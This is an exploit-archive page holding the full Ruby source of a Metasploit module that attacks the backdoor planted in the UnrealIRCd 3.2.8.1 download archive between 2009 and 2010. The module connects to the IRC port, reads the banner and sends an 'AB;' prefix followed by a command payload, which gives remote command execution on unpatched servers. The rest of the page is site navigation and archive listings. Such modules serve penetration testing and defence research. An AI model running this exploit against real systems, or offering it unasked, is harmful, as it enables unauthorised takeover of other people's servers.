UnrealIRCD 3.2.8.1 Backdoor Command Execution

UnrealIRCD 3.2.8.1 Backdoor Command Execution: Posted Jun 15, 2010; Authored by H D Moore | Site metasploit.com; This Metasploit module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.; tags | exploit; SHA-256 | 52f914f7168fd04b82c913d02b7265643ee5d7402d40a96322c070c6b1569b32; Download | Favorite | View

UnrealIRCD 3.2.8.1 Backdoor Command Execution

##
# $Id: unreal_ircd_3281_backdoor.rb 9510 2010-06-13 12:41:48Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
      'Description'    => %q{
        This module uses exploits a malicious backdoor that was added to the
      Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
      Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9510 $',
      'References'     =>
        [
          [ 'OSVDB', '65445'],
          [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt'],
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby bash telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0))

      register_options(
        [
          Opt::RPORT(6667)
        ], self.class)
  end

  def exploit
    connect

    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line("    #{line}")
    end

    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    handler
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 136 files
Jay Turla 111 files
Ubuntu 63 files
Gentoo 33 files
Debian 27 files
sinn3r 23 files
h00die 23 files
Pedro Ribeiro 21 files
juan vazquez 18 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (377)
CentOS (58)
Cisco (1,944)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (386)
iPhone (108)
IRIX (220)
Juniper (70)
Linux (50,966)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,661)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,788)
UNIX (9,443)
UnixWare (187)
Windows (6,732)
Other

UnrealIRCD 3.2.8.1 Backdoor Command Execution

UnrealIRCD 3.2.8.1 Backdoor Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

UnrealIRCD 3.2.8.1 Backdoor Command Execution

Share This

UnrealIRCD 3.2.8.1 Backdoor Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems